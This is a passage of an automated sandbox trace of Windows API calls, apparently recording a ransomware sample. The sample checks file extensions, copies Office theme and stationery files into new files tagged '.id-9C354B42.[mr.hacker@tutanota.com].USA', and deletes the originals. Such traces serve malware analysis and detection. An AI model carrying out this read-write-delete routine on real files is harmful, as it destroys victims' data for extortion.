lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.754] lstrlenW (lpString=".ppt") returned 4 [0042.754] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.754] lstrlenW (lpString=".zip") returned 4 [0042.754] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.754] lstrlenW (lpString=".rar") returned 4 [0042.754] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.754] lstrlenW (lpString=".bz2") returned 4 [0042.754] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.754] lstrlenW (lpString=".7z") returned 3 [0042.754] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.754] lstrlenW (lpString=".dbf") returned 4 [0042.754] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.754] lstrlenW (lpString=".1cd") returned 4 [0042.754] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.754] lstrlenW (lpString=".jpg") returned 4 [0042.754] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.755] lstrlenW (lpString=".doc") returned 4 [0042.755] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.755] lstrlenW (lpString=".docx") returned 5 [0042.755] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.755] lstrlenW (lpString=".pdf") returned 4 [0042.755] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.755] lstrlenW (lpString=".xls") returned 4 [0042.755] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.755] lstrlenW (lpString=".xlsx") returned 5 [0042.755] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.755] lstrlenW (lpString=".ppt") returned 4 [0042.755] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.755] lstrlenW (lpString=".zip") returned 4 [0042.755] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.755] lstrlenW (lpString=".rar") returned 4 [0042.755] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.755] lstrlenW (lpString=".bz2") returned 4 [0042.755] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.755] lstrlenW (lpString=".7z") returned 3 [0042.755] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.755] lstrlenW (lpString=".dbf") returned 4 [0042.755] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.755] lstrlenW (lpString=".1cd") returned 4 [0042.755] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.755] lstrlenW (lpString=".jpg") returned 4 [0042.755] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.755] lstrcmpiW (lpString1=".htm", lpString2=".USA") returned -1 [0042.756] lstrlenW (lpString="Hand Prints.htm") returned 15 [0042.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.756] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=235) returned 1 [0042.756] CloseHandle (hObject=0x200) returned 1 [0042.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0x20 [0042.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.757] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.757] lstrlenW (lpString=".doc") returned 4 [0042.757] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.757] lstrlenW (lpString=".docx") returned 5 [0042.757] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.757] lstrlenW (lpString=".pdf") returned 4 [0042.757] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.757] lstrlenW (lpString=".xls") returned 4 [0042.757] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.757] lstrlenW (lpString=".xlsx") returned 5 [0042.757] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.757] lstrlenW (lpString=".ppt") returned 4 [0042.757] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.757] lstrlenW (lpString=".zip") returned 4 [0042.757] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.757] lstrlenW (lpString=".rar") returned 4 [0042.757] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.757] lstrlenW (lpString=".bz2") returned 4 [0042.757] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.757] lstrlenW (lpString=".7z") returned 3 [0042.757] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.757] lstrlenW (lpString=".dbf") returned 4 [0042.757] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.775] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0042.775] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0042.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.777] GetLastError () returned 0x0 [0042.777] ReadFile (in: hFile=0x200, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x621, lpOverlapped=0x0) returned 1 [0042.778] WriteFile (in: hFile=0x208, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x630, lpOverlapped=0x0) returned 1 [0042.779] ReadFile (in: hFile=0x200, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0042.779] WriteFile (in: hFile=0x208, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0042.779] SetEndOfFile (hFile=0x208) returned 1 [0042.779] CloseHandle (hObject=0x208) returned 1 [0042.780] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0042.780] SetEndOfFile (hFile=0x200) returned 1 [0042.781] CloseHandle (hObject=0x200) returned 1 [0042.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0042.781] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif")) returned 1 [0042.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.781] lstrlenW (lpString=".doc") returned 4 [0042.782] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0042.782] lstrlenW (lpString=".docx") returned 5 [0042.782] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0042.782] lstrlenW (lpString=".pdf") returned 4 [0042.782] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0042.782] lstrlenW (lpString=".xls") returned 4 [0042.782] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0042.782] lstrlenW (lpString=".xlsx") returned 5 [0042.782] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0042.782] lstrlenW (lpString=".ppt") returned 4 [0042.782] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0042.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.782] lstrlenW (lpString=".zip") returned 4 [0042.782] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0042.782] lstrlenW (lpString=".rar") returned 4 [0042.782] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0042.782] lstrlenW (lpString=".bz2") returned 4 [0042.782] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0042.782] lstrlenW (lpString=".7z") returned 3 [0042.782] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0042.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.782] lstrlenW (lpString=".dbf") returned 4 [0042.782] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0042.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.782] lstrlenW (lpString=".1cd") returned 4 [0042.782] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0042.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.782] lstrlenW (lpString=".jpg") returned 4 [0042.782] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0042.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.782] lstrlenW (lpString=".doc") returned 4 [0042.782] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0042.782] lstrlenW (lpString=".docx") returned 5 [0042.783] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0042.783] lstrlenW (lpString=".pdf") returned 4 [0042.783] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0042.783] lstrlenW (lpString=".xls") returned 4 [0042.783] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0042.783] lstrlenW (lpString=".xlsx") returned 5 [0042.783] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0042.783] lstrlenW (lpString=".ppt") returned 4 [0042.783] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0042.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.783] lstrlenW (lpString=".zip") returned 4 [0042.783] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0042.783] lstrlenW (lpString=".rar") returned 4 [0042.783] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0042.783] lstrlenW (lpString=".bz2") returned 4 [0042.783] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0042.783] lstrlenW (lpString=".7z") returned 3 [0042.783] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0042.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.783] lstrlenW (lpString=".dbf") returned 4 [0042.783] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0042.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.783] lstrlenW (lpString=".1cd") returned 4 [0042.783] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0042.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.783] lstrlenW (lpString=".jpg") returned 4 [0042.783] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0042.783] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0042.783] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0042.783] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.062] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=25234) returned 1 [0043.062] CloseHandle (hObject=0x20c) returned 1 [0043.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 0x20 [0043.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0043.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.062] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0043.062] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0043.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0043.063] GetLastError () returned 0x0 [0043.063] ReadFile (in: hFile=0x20c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x6292, lpOverlapped=0x0) returned 1 [0043.512] WriteFile (in: hFile=0x210, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x62a0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x62a0, lpOverlapped=0x0) returned 1 [0043.514] ReadFile (in: hFile=0x20c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0043.514] WriteFile (in: hFile=0x210, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.514] SetEndOfFile (hFile=0x210) returned 1 [0043.514] CloseHandle (hObject=0x210) returned 1 [0043.515] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0043.515] SetEndOfFile (hFile=0x20c) returned 1 [0043.516] CloseHandle (hObject=0x20c) returned 1 [0043.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0043.516] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 1 [0043.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.517] lstrlenW (lpString=".doc") returned 4 [0043.517] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.517] lstrlenW (lpString=".docx") returned 5 [0043.517] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.517] lstrlenW (lpString=".pdf") returned 4 [0043.517] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.517] lstrlenW (lpString=".xls") returned 4 [0043.517] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.517] lstrlenW (lpString=".xlsx") returned 5 [0043.517] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.517] lstrlenW (lpString=".ppt") returned 4 [0043.517] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.517] lstrlenW (lpString=".zip") returned 4 [0043.517] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.517] lstrlenW (lpString=".rar") returned 4 [0043.517] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.517] lstrlenW (lpString=".bz2") returned 4 [0043.517] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.517] lstrlenW (lpString=".7z") returned 3 [0043.517] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.517] lstrlenW (lpString=".dbf") returned 4 [0043.517] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.517] lstrlenW (lpString=".1cd") returned 4 [0043.517] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.517] lstrlenW (lpString=".jpg") returned 4 [0043.517] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.517] lstrlenW (lpString=".doc") returned 4 [0043.517] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.518] lstrlenW (lpString=".docx") returned 5 [0043.518] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.518] lstrlenW (lpString=".pdf") returned 4 [0043.518] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.518] lstrlenW (lpString=".xls") returned 4 [0043.518] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.518] lstrlenW (lpString=".xlsx") returned 5 [0043.518] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.518] lstrlenW (lpString=".ppt") returned 4 [0043.518] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.518] lstrlenW (lpString=".zip") returned 4 [0043.518] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.518] lstrlenW (lpString=".rar") returned 4 [0043.518] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.518] lstrlenW (lpString=".bz2") returned 4 [0043.518] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.518] lstrlenW (lpString=".7z") returned 3 [0043.518] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.518] lstrlenW (lpString=".dbf") returned 4 [0043.518] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.518] lstrlenW (lpString=".1cd") returned 4 [0043.518] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.518] lstrlenW (lpString=".jpg") returned 4 [0043.518] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.518] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0043.518] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.519] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=34916) returned 1 [0043.519] CloseHandle (hObject=0x20c) returned 1 [0043.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 0x20 [0043.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0043.519] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.519] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0043.519] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0043.519] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0043.520] GetLastError () returned 0x0 [0043.520] ReadFile (in: hFile=0x20c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x8864, lpOverlapped=0x0) returned 1 [0043.630] WriteFile (in: hFile=0x210, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x8870, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x8870, lpOverlapped=0x0) returned 1 [0043.631] ReadFile (in: hFile=0x20c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0043.631] WriteFile (in: hFile=0x210, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.631] 